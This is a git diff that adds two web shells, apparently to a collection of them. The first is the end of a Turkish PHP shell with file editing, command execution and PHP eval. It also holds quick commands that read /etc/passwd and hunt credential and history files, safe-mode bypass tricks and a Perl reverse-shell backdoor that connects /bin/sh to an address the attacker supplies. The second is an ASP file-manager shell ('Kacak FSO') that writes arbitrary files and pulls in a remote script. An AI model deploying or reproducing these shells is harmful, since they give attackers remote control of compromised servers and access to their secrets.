+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+           (($perms & 0x0200) ? 't' : 'x' ) :
+           (($perms & 0x0200) ? 'T' : '-'));    print $info;}
+
+		  function readable_size($size) {
+
+if ($size < 1024) {
+print $size . ' B';
+}else {$units = array("kB", "MB", "GB", "TB");
+foreach ($units as $unit) {
+$size = ($size / 1024);
+if ($size < 1024) {break;}}printf ("%.2f",$size);print ' ' . $unit;}}
+if($dlink=='ren'&&!isset($_REQUEST['rensub'])){
+print "<div><b><center>[<a href=".$PHP_SELF."?scdir=$nscdir> Geri </a>]</div>";
+print "<center>".$sf;input ("text","ren",$_REQUEST['ren'],20);print " ";
+input ("text","renf","New-name",20);print " ";
+input ("submit","rensub","Rename" ,"");print $ef;die();}else print "";
+if (isset ($_REQUEST['ren'])&&isset($_REQUEST['renf'])){
+if (rename($nscdir."/".$_REQUEST['ren'],$nscdir."/".$_REQUEST['renf'])){
+print"<center><div><b>[ ". $_REQUEST['ren']." is renamed to " .$sfnt.$_REQUEST['renf'].$efnt." successfully ]</center></div></b>";print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Curr-dir </a>]</div>";die();}else{print "<div><b><center>[ Yeniden Adlandirilamiyor ]</div>";
+print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Geri </a>]</div>";die();}}function fget($nscdir,$sf,$ef){print "<center>";
+print "<div><b>[ Editing <font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> ] [<a href='javascript:history.back()'> Geri </a>] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div>";
+print $sf."<textarea cols=157 rows=23 name=edittxt>";  
+$alltxt= file_get_contents($_REQUEST['edit']);
+$nalltxt=htmlspecialchars($alltxt);print $nalltxt;print "</textarea></center>";
+if (is_writable($_REQUEST['edit'])){
+print "<center><input type=submit value='Save-file' > <input type=reset value='Reset' ></center>".$ef;}else {print "<div><b><center>[ Can't edit 
+<font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> ]</center></b></div><br>";}}function svetxt(){
+$fp=fopen ($_REQUEST['edit'],"w");if (is_writable($_REQUEST['edit'])){
+$nedittxt=stripslashes($_REQUEST['edittxt']);
+fwrite ($fp,$nedittxt);print "<div><b><center>[ <font color=DeepSkyBlue  >".basename($_REQUEST['edit'])."</font> Saved !! ]</center></b></div>";fclose($fp);}else {print "<div><b><center>[ Can't save the file !! ]</center></b></div>";}}
+if ($dlink=='edit'&&!isset ($_REQUEST['edittxt'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])&&!isset($_REQUEST['subqcmnds'])&&!isset($_REQUEST['eval']))
+{fget($nscdir,$sf,$ef);}elseif (isset ($_REQUEST['edittxt']))
+{svetxt();fget($nscdir,$sf,$ef);}else {print "";}function owgr($file){
+$fileowneruid=fileowner($file); $fileownerarray=posix_getpwuid($fileowneruid); 
+$fileowner=$fileownerarray['name']; $fileg=filegroup($file);
+$groupinfo = posix_getgrgid($fileg);$filegg=$groupinfo['name'];
+print "$fileowner/$filegg"; }$cpyf=trim($_REQUEST['cpyf']);$ftcpy=trim($_REQUEST['ftcpy']);$cpmv= $cpyf.'/'.$ftcpy;if (isset ($_REQUEST['cpy'])){
+if (copy($ftcpy,$cpmv)){$cpmvmess=basename($ftcpy)." copied successfully";}else {$cpmvmess="Can't copy ".basename($ftcpy);}}
+elseif(isset($_REQUEST['mve'])){
+if (copy($ftcpy,$cpmv)&&unlink ($ftcpy)){$cpmvmess= basename($ftcpy)." moved successfully";}else {$cpmvmess="Can't move ".basename($ftcpy);}
+}else {$cpmvmess="Kopyala/Tasimak için Dosya Seç";}
+if (isset ($_REQUEST['safefile'])){
+$file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){
+if(empty($_GET['file'])){if(empty($_POST['file'])){
+print "<center>[ Please choose a file first to read it using copy() ]</center>";
+} else {$file=$_POST['file'];}} else {$file=$_GET['file'];}}
+$temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){
+$zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);echo "<center><pre>".$sta.htmlspecialchars($tekst).$eta."</pre></center>";unlink($temp);} else {
+print "<FONT COLOR=\"RED\"><CENTER>Sorry, Can't read the selected file !!
+</CENTER></FONT><br>";}}if (isset ($_REQUEST['inifile'])){
+ini_restore("safe_mode");ini_restore("open_basedir");
+print "<center><pre>".$sta;
+if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."</pre></center>";}
+if (isset ($_REQUEST['bip'])&&isset ($_REQUEST['bport'])){callback($nscdir,$_REQUEST['bip'],$_REQUEST['bport']);}
+function callback($nscdir,$bip,$bport){
+if(strstr(php_os,"WIN")){$epath="cmd.exe";}else{$epath="/bin/sh";}
+if (is_writable($nscdir)){
+$fp=fopen ("back.pl","w");$backpl='back.pl';}
+else {$fp=fopen ("/tmp/back.pl","w");$backpl='/tmp/back.pl';}
+fwrite ($fp,"use Socket;
+\$system='$epath';
+\$sys= 'echo \"[ Operating system ][$]\"; echo \"`uname -a`\";
+echo \"[ Curr DIR ][$]\"; echo \"`pwd`\";echo;
+echo \"[ User perms ][$]\";echo \"`id`\";echo;
+echo \"[ Start shell ][$]\";';
+
+if (!\$ARGV[0]) {
+  exit(1);
+}
+\$host = \$ARGV[0];
+\$port = 80;
+if (\$ARGV[1]) {
+  \$port = \$ARGV[1];
+}
+\$proto = getprotobyname('tcp') || die('Unknown Protocol\n');
+socket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die ('Socket Error\n');
+my \$target = inet_aton(\$host);
+if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) {
+  die('Unable to Connect\n');
+}
+if (!fork( )) {
+  open(STDIN,'>&SERVER');
+  open(STDOUT,'>&SERVER');
+  open(STDERR,'>&SERVER');
+print '\n[ Bk-Code shell by Black-Code :: connect back backdoor by Crash_over_ride ]';
+print '\n[ A-S-T team ][ Lezr.com ]\n\n'; 
+         system(\$sys);system (\$system);
+          exit(0); }
+		  ");callfuncs("chmod 777 $backpl");
+ob_start();
+callfuncs("perl $backpl $bip $bport");
+ob_clean();
+print "<div><b><center>[ Selected IP is ".$_REQUEST['bip']." and port is ".$_REQUEST['bport']." ]<br>
+[ Check your connection now, if failed try changing the port number ]<br>
+[ Or Go to a writable dir and then try to connect again ]<br>
+[ Return to the Current dir ] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>] 
+</div><br>";}if (isset($_REQUEST['uback'])){
+$uback=$_REQUEST['uback'];$upip=$_REQUEST['upip']; 
+if ($_REQUEST['upports']=="up80"){callfuncs("perl $uback $upip 80");}
+elseif ($_REQUEST['upports']=="up443"){callfuncs("perl $uback $upip 443");}
+elseif ($_REQUEST['upports']=="up2121"){callfuncs("perl $uback $upip 2121");}}
+delm("# Komut ÇAlistir #");print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100% height=18%>";
+print "<tr><td width=32%><div align=left>";
+print $st.$c1."<center><div><b>".$mess3.$ec; 
+print $c2.$sf."<center>";input("text","cfile","",53);
+input("hidden","scdir",$nscdir,0);print "<br>";
+input("submit","crefile","Olustur","");
+print " ";input("submit","delfile","Sil","");
+print "</center>".$ef.$ec.$et."</div></td>";
+print "<td><div align=center>".$st.$c1;
+print "<center><div><b>Enter the command to execute";print $ec;
+print $c2.$sf."<center><div style='margin-top:7px'>"; 
+input("text","cmd","",59);input("hidden","scdir",$nscdir,0);print"<br>";
+input("submit","","Execute","");print "</center>".$ef.$ec.$et."</div></td>";
+print "<td width=32%><div align=right>";print $st.$c1;
+print "<center><div><b>$mess".$ec.$c2.$sf."<center>";
+input("text","dir","",53);input("hidden","scdir",$nscdir,0);print "<br>";
+input("submit","credir","Create-D","");print " ";
+input("submit","deldir","Delete-D","");
+print "</center>".$ef.$ec.$et."</div></td></tr>";
+print "<tr><td width=32%><div align=left>";print $st.$c1;
+print "<center><div><b>Dosya Düzenle/Oku".$ec;print $c2.$sf."<center>";
+input("text","rfile",$nscdir,53);input("hidden","scdir",$nscdir,0);print "<br>";
+input("submit","","Oku-Düzenle","");print "</center>".$ef.$ec.$et."</div></td>";
+print "<td><div align=center>";print $st.$c1;
+print "<center><div><b>Dizin'i Göster<br>";print $ec.$c2.$sf."<center><div style='margin-top:7px'>"; input("text","scdir",$nscdir,59);print"<br>";
+input("submit","","Göster","");print " ";
+input("reset","","R00T","");print "</center>".$ef.$ec.$et."</div></td>";
+print "<td><div align=center>";print $st.$c1;
+print "<center><div><b>Dosya Boyutu : ".filesize($upfile)." in ( B/Kb )";print $ec.$c2."<form method=post Enctype=multipart/form-data><center>"; 
+input("file","upfile","",40);input("hidden","scdir",$nscdir,0);
+input("hidden","up",$nscdir,0);
+print"<br>";input("submit","","Upload","");print "</center>".$ef.$ec.$et."</div></td></tr>";
+delm("");print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";print "<tr><td width=50%><div align=left>";
+print $st.$c1."<div><b><center>Execute php code with eval()</div>";
+print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);
+print "&nbsp;<textarea cols=73 rows=3 name=eval>";
+if(!isset($evsub)){print "//system('id'); //readfile('/etc/passwd'); //passthru('pwd');";}else{print htmlspecialchars(stripslashes($eval));}
+print "</textarea><br><center>";
+input('submit','evsub','Execute');print " ";
+input('Reset','','Reset');print " ";
+print "</center>".$ec.$ef.$et;
+print "</td><td height=20% width=50%><div align=center>";
+print $st.$c1."<div><b><center>Execute useful commands</div>";
+print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);
+print "<center><select style='width:60%' name=uscmnds size=1>
+<option value='op0'>Execute quick commands</option>
+<option value='op1'>ls -lia</option>
+<option value='op2'>/etc/passwd</option>
+<option value='op3'>/var/cpanel/accounting.log</option>
+<option value='op4'>/var/named</option>
+<option value='op11'>Perms in curr Dir</option>
+<option value='op12'>Perms in main Dir</option>
+<option value='op5'>Find service.pwd files</option>
+<option value='op6'>Find config files</option>
+<option value='op7'>Find .bash_history files</option>
+<option value='op8'>Read hosts file</option>
+<option value='op9'>Root login</option>
+<option value='op10'>Show opened ports</option>
+<option value='op13'>Show services</option>
+</select> ";print"<input type=submit name=subqcmnds value=Execute style='height:20'> <input type=reset value=Return style='height:20'></center>";
+print $ec.$ef.$et."</td></tr></table>";delm("");
+print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
+print "<tr><td width=50%><div align=left>";
+print $st.$c1."<div><b><center>".$cpmvmess."</div>";
+print $ec.$c2.$sf."&nbsp;";input("text","ftcpy","File-name",15);
+print "<b><font face=tahoma size=2>&nbsp;To </b>";
+input("text","cpyf",$nscdir,45);input("hidden","scdir",$nscdir,0);print " ";
+input("submit","cpy","Copy","");print " ";input("submit","mve","Move","");
+print "</center>".$ec.$ef.$et;
+print "</td><td height=20% width=50%><div align=right>";
+print $st.$c1."<div><b><center>Cok kullanilan Komutlar</div>";
+print $ec.$c2.$sf."&nbsp";input("hidden","scdir",$nscdir,0);
+print "<select style='width:22%' name=ustools size=1>
+<option value='t1'>Wget</option><option value='t2'>Curl</option>
+<option value='t3'>Lynx</option><option value='t9'>Get</option>
+<option value='t4'>Unzip</option><option value='t5'>Tar</option>
+<option value='t6'>Tar.gz</option><option value='t7'>Chmod 777</option>
+<option value='t8'>Make</option></select> ";input('text','ustname','',51);print " ";input('submit','ustsub','Execute');print "</center>".$ec.$ef.$et;
+print "</td></tr></table>";delm(": Safe mode bypass :");
+print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
+print "<tr><td width=50%><div align=left>";
+print $st.$c1."<div><b><center>Using copy() function</div>";
+print $ec.$c2.$sf."&nbsp;";input("text","safefile",$nscdir,75);
+input("hidden","scdir",$nscdir,0);print " ";
+input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
+print "</td><td height=20% width=50%><div align=right>";
+print $st.$c1."<div><b><center>Using ini_restore() function</div>";
+print $ec.$c2.$sf."&nbsp;";input("text","inifile",$nscdir,75);
+input("hidden","scdir",$nscdir,0);print " ";
+input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
+print "</td></tr></table>";delm("# Backdoor Baglantisi #");
+print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
+print "<tr><td width=50%><div align=left>";
+print $st.$c1."<div><b><center>Backdoor ile Baglan</div>";
+print $ec.$c2.$sf."&nbsp;";input("text","bip",$REMOTE_ADDR,47);print " ";
+input("text","bport",80,10);input("hidden","scdir",$nscdir,0);print " ";
+input("submit","","Connect","");print " ";input("reset","","Reset","");
+print "</center>".$ec.$ef.$et;print "</td><td height=20% width=50%><div align=right>";print $st.$c1."<div><b><center>Yüklenmis Backdoor</div>";
+print $ec.$c2.$sf."&nbsp;";print "<select style='width:15%' name=upports size=1>
+<option value='up80'>80</option><option value='up443'>443</option>
+<option value='up2121'>2121</option></select>";print " ";
+input("text","uback","back.pl",23);print " ";
+input("text","upip",$REMOTE_ADDR,29);print " ";input("submit","subupb","Connect");
+print "</center>".$ec.$ef.$et;print "</td></tr></table>";
+print "<br><table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>"; print"<tr><td><font size=2 face=tahoma>"; 
+print"<center>Copyright  is reserved to Ekin0x <br>[  By Cyber Security TIM Go to : <a target='_blank' href='http://www.cyber-warrior.org'>www.cyber-warrior.org</a> ]"; 
+print"</font>
+</td></tr></table>";
+?>
\ No newline at end of file
diff --git a/php/kacak.php b/php/kacak.php
new file mode 100644
index 0000000..91ab2b3
--- /dev/null
+++ b/php/kacak.php
@@ -0,0 +1,903 @@
+<html>
+<center><h3>www.kacaq.blogspot.com</h3> || By Kacak || <h1>BuqX@HotMail.Com</h1></center>
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>Kacak FSO 1.0 / GrayHatz Hacking Team - Terrorist Crew - TurkGuvenligi Priv8 Team / GrayHatz.Org ~ TurkGuvenligi.İnfo</title>
+</head>
+
+<body topmargin="0" leftmargin="0" bgcolor="#EAEAEA">
+
+<script language="JavaScript">
+<!--
+function MM_openBrWindow(theURL,winName,features) { //v2.0
+  window.open(theURL,winName,features);
+}
+//-->
+</script>
+
+<%
+if request.querystring("TGH") = "1" then
+on error resume next
+es=request.querystring("Kacak")
+diez=server.urlencode(left(es,(instrRev(es,"\"))-1))
+
+Select case es
+case "C:" diez="C:"
+case "D:" diez="D:"
+end select
+
+
+
+
+%>
+
+
+
+
+
+<body topmargin="0" leftmargin="0"
+onLoad="location.href='?klas=<%=diez%>&usak=1'">
+
+<%
+else
+%>
+
+
+
+<%
+if request.querystring("Dosyakaydet") <> "" then
+set kaydospos=createobject("scripting.filesystemobject")
+set	kaydoses=kaydospos.createtextfile(request.querystring("dosyakaydet") & request("dosadi"))
+set kaydoses=nothing
+set kaydospos=nothing
+set kaydospos=createobject("scripting.filesystemobject")
+set kaydoses=kaydospos.opentextfile(request.querystring("dosyakaydet") & request("dosadi"), 2, true)
+kaydoses.write request("duzenx")
+set kaydoses=nothing
+set kaydospos=nothing
+end if
+%>
+
+
+
+
+
+<%
+if request.querystring("yenidosya") <> "" then
+%>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.grayhatz.org/forum/dragontwo/logo.jpg"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
+    <span style="font-weight: 700">
+    <br>
+    TC & GH & TC TEAM ©<br>
+    </span>Terrorist Crew - GrayHatz Hacking Team - TurkGuvenligi Priv8 Team<br>
+    <span style="font-weight: 700">
+    <br>
+    KACAK FSO 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.grayhatz.org ~ http://www.turkguvenligi.info" style="text-decoration: none">
+    <font color="#858585">GrayHatz ~ TurkGuvenligi.İnfo</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
+    <font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hotmail.com" style="text-decoration: none"><font color="#858585">@GrayHatz ~ TurkGuvenligi.İnfo</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan Klasör</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(request.querystring("yenidosya"))%></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#B7B7B7">
+    <form method="POST" action="?dosyakaydet=<%=request.querystring("yenidosya")%>&klas=<%=request.querystring("yenidosya")%>" name="kaypos">
+<p align="center"><b><font size="1" face="Verdana">
+<br>
+Dosya Adı : <br>
+                </font>
+	</b><font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="97" maxlength="32"
+                name="dosadi" value="Dosya Adı"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanıcı'"
+                onfocus="if (this.value == 'Kullanıcı') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"><br>
+<br>
+                </font>
+	<b><font size="1" face="Verdana">
+İçerik :&nbsp; <br>
+                </font>
+	<font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="95" wrap="OFF"><%=sedx%></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Oluştur"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></p>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber19">
+  <tr>
+    <td width="100%" align="right" bgcolor="#000000">
+    <p align="center">
+	&nbsp;</td>
+  </tr>
+</table>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#EAEAEA">
+    <p align="right">
+	&nbsp;</td>
+  </tr>
+</table>
+
+
+
+<%
+else
+%>
+
+
+
+
+
+
+
+<%
+if request.querystring("klasorac") <> "" then
+
+set doses=createobject("scripting.filesystemobject")
+set es=doses.createfolder(request.querystring("aktifklas") & request("duzenx"))
+set es=nothing
+set doses=nothing
+
+
+end if
+%>
+
+<%
+if request.querystring("klasac") <> "" then
+
+set aktifklas=request.querystring("aktifklas")
+
+
+%>
+    <td width="65" bgcolor="#000000" height="76">
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber25" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.grayhatz.org/forum/dragontwo/logo.jpg"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    <center>TC & GH & TC TEAM ©<br>
+    </span>Terrorist Crew - GrayHatz Hacking Team - TurkGuvenligi Priv8 Team<br>
+    <span style="font-weight: 700">
+    <br>
+    KACAK FSO 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.grayhatz.org ~ http://www.turkguvenligi.info" style="text-decoration: none">
+    <font color="#858585">GrayHatz ~ TurkGuvenligi.İnfo</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
+    <font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hootmail.com" style="text-decoration: none"><font color="#858585">@Hotmail.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+
+
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan Alan</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=aktifklas%></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="174">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#C5C5C5" height="134">
+    <form method="POST" action="?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>" name="klaspos">
+<p align="center"><font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="37" maxlength="32"
+                name="duzenx" value="Klasör Adı"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanıcı'"
+                onfocus="if (this.value == 'Kullanıcı') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center">&nbsp;&nbsp;
+<br>
+<br>
+<br>
+                </font>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Oluştur"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+
+
+<%
+else
+%>
+
+
+
+<%
+if request.querystring("suruculer") <> "" then
+%>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.grayhatz.org/forum/dragontwo/logo.jpg"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    TC & GH & TC TEAM ©<br>
+    </span>Terrorist Crew - GrayHatz Hacking Team - TurkGuvenligi Priv8 Team<br>
+    <span style="font-weight: 700">
+    <br>
+    KACAK FSO 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.grayhatz.org ~ http://www.turkguvenligi.info" style="text-decoration: none">
+    <font color="#858585">www.GrayHatz ~ TurkGuvenligi.İnfo</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
+    <font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hootmail.com" style="text-decoration: none"><font color="#858585">@Hotmail.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="4">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="4">
+        <span style="font-size: 2pt">&nbsp;</span></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="153">
+  <tr>
+    <td width="100%" height="19" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" height="113" bgcolor="#E1E1E1">&nbsp;<div align="center">
+      <center>
+      <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber2" height="17">
+        <tr>
+          <td width="208" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Sürücü Adı</font></td>
+          <td width="75" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Boyutu</font></td>
+          <td width="75" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Boş Alan</font></td>
+          <td width="64" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Durum</font></td>
+          <td width="62" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">İşlem</font></td>
+        </tr>
+      </table>
+      </center>
+    </div>
+    <div align="center">
+      <center>
+
+
+	<%
+	set klassis =server.createobject("scripting.filesystemobject")
+	set klasdri=klassis.drives
+	%>
+	
+	<%
+	for each dongu in klasdri
+	%>
+			
+	<%
+	if dongu.driveletter <> "A" then
+	if dongu.isready=true then
+	%>
+
+	<%
+	select case dongu.drivetype
+	case 0 teype="Diğer"
+	case 1 teype="Taşınır"
+	case 2 teype="HDD"
+	case 3 teype="NetWork"
+	case 4 teype="CD-Rom"
+	case 5 teype="FlashMem"
+	end select
+	%>
+      <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber3" height="17">
+        <tr>
+          <td width="208" height="17" align="left" bgcolor="#EEEEEE">
+          <font face="Verdana" style="font-size: 8pt">&nbsp;<%=dongu.driveletter%>:\ ( <%=dongu.filesystem%> )</font></td>
+          <td width="75" height="17" align="center" bgcolor="#E0E0E0">
+          <font face="Verdana" style="font-size: 8pt"><%=Round(dongu.totalsize/(1024*1024),1)%> MB</font></td>
+          <td width="75" height="17" align="center" bgcolor="#E0E0E0">
+          <font face="Verdana" style="font-size: 8pt"><%=Round(dongu.availablespace/(1024*1024),1)%> MB</font></td>
+          <td width="64" height="17" align="center" bgcolor="#E0E0E0">
+          <font face="Verdana" style="font-size: 8pt"><%=teype%>&nbsp;</font></td>
+          <td width="62" height="17" align="center" bgcolor="#E0E0E0">
